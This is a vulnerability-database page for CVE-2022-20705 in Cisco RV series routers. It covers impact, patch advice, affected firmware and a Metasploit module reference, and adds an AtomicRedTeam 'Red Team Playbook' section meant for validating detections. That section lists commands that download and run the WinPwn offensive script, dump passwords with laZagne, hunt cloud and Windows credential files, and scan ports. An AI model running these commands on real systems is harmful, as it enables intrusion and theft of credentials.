CVE-2022-20705
Overview
The vulnerabilities stem from multiple memory safety errors including stack-based buffer overflows and improper input validation within the firmware of Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers. These flaws reside in the router's firmware components responsible for processing network and management protocol inputs, leading to unchecked memory operations and authentication bypass mechanisms. The affected components include the routing and management interface subsystems handling external commands and software update processes.
Vulnerability Description
Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.
Impact
An unauthenticated attacker with network access can execute arbitrary code, escalate privileges, bypass authentication, and cause denial of service on affected Cisco RV Series routers. This enables full compromise of the device, including running unsigned software and arbitrary commands, potentially disrupting network operations and allowing lateral movement within the network. The CVSS vector (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H) confirms no authentication or user interaction is required, with complete impact on confidentiality, integrity, and availability.
Solution
Cisco has released firmware updates addressing these vulnerabilities for the RV160, RV260, RV340, and RV345 Series Routers as detailed in their security advisory (cisco-sa-smb-mult-vuln-KA9PK6D). Administrators should apply the latest firmware versions provided by Cisco immediately. Additional technical details and patch instructions are available in the Cisco advisory and related ZDI advisories (ZDI-22-409, ZDI-22-410, ZDI-22-415). No specific workarounds are recommended beyond applying these official patches.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
Recent vulnerabilities in Cisco's Small Business RV series routers, including the RV160, RV260, RV340, and RV345 models, present significant security risks. These vulnerabilities allow attackers to execute arbitrary code, elevate privileges, and bypass authentication mechanisms, among other malicious activities. The underlying issues stem from improper input validation and insufficient security controls within the router firmware. This creates a pathway for attackers to exploit the devices, potentially leading to unauthorized access and control over the network infrastructure.
Attack vectors for these vulnerabilities are varied and can be exploited through both local and remote means. An attacker could leverage crafted packets or malicious scripts to exploit the firmware flaws, gaining the ability to execute arbitrary commands or run unsigned software. Furthermore, the ability to bypass authentication and authorization protections means that even users with limited access could escalate their privileges, leading to a complete compromise of the device. Denial of service attacks are also a concern, as they could disrupt network operations, causing significant downtime for businesses that rely on these routers for connectivity.
The real-world impact of these vulnerabilities can be profound, particularly for small to medium-sized enterprises that depend on these routers for their network infrastructure. A successful attack could result in unauthorized access to sensitive data, disruption of services, and potential financial losses due to downtime or data breaches. Additionally, the reputational damage from such incidents can have long-lasting effects, eroding customer trust and impacting business relationships. The high CVSS score associated with these vulnerabilities underscores the urgent need for organizations to address them proactively.
To detect and mitigate these vulnerabilities, organizations should implement a multi-faceted approach. Regularly updating router firmware is crucial, as vendors frequently release patches to address known vulnerabilities. Network monitoring tools can help identify unusual traffic patterns or unauthorized access attempts, providing an early warning system for potential exploitation. Additionally, employing strong access controls and segmenting networks can limit the impact of any successful attacks, reducing the attack surface available to malicious actors. Organizations should also conduct regular security assessments and penetration testing to identify and remediate vulnerabilities before they can be exploited.
In conclusion, the vulnerabilities present in Cisco's Small Business RV series routers pose a significant threat to network security. The potential for arbitrary code execution, privilege escalation, and denial of service attacks highlights the importance of maintaining robust security practices. By staying informed about vulnerabilities, implementing timely updates, and employing comprehensive detection and mitigation strategies, organizations can protect themselves from the risks associated with these critical network devices.
Affected Products (9)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Cisco | Rv340 Firmware | All |
cpe:2.3:o:cisco:rv340_firmware:*:*:*:*:*:*:*:*
|
|
|
Cisco | Rv340w Firmware | All |
cpe:2.3:o:cisco:rv340w_firmware:*:*:*:*:*:*:*:*
|
|
|
Cisco | Rv345 Firmware | All |
cpe:2.3:o:cisco:rv345_firmware:*:*:*:*:*:*:*:*
|
|
|
Cisco | Rv345p Firmware | All |
cpe:2.3:o:cisco:rv345p_firmware:*:*:*:*:*:*:*:*
|
|
|
Cisco | Rv160 Firmware | All |
cpe:2.3:o:cisco:rv160_firmware:*:*:*:*:*:*:*:*
|
|
|
Cisco | Rv160w Firmware | All |
cpe:2.3:o:cisco:rv160w_firmware:*:*:*:*:*:*:*:*
|
|
|
Cisco | Rv260 Firmware | All |
cpe:2.3:o:cisco:rv260_firmware:*:*:*:*:*:*:*:*
|
|
|
Cisco | Rv260p Firmware | All |
cpe:2.3:o:cisco:rv260p_firmware:*:*:*:*:*:*:*:*
|
|
|
Cisco | Rv260w Firmware | All |
cpe:2.3:o:cisco:rv260w_firmware:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Cisco RV Series Authentication Bypass and Command Injection
exploits/linux/http/cisco_rv340_lan
|
Biem Pham, Neterum, jbaines-r7 | Unknown | - | View |
Threat Feed
1 eventsPublic exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (6)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-20705 |
| tools.cisco.com |
GitHub CVE
vendor-advisory
|
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D |
| zerodayinitiative.com |
GitHub CVE
|
https://www.zerodayinitiative.com/advisories/ZDI-22-415/ |
| zerodayinitiative.com |
GitHub CVE
|
https://www.zerodayinitiative.com/advisories/ZDI-22-409/ |
| zerodayinitiative.com |
GitHub CVE
|
https://www.zerodayinitiative.com/advisories/ZDI-22-410/ |
| packetstormsecurity.com |
GitHub CVE
|
http://packetstormsecurity.com/files/170988/Cisco-RV-Series-Authentication-Bypass-Command-Injection.html |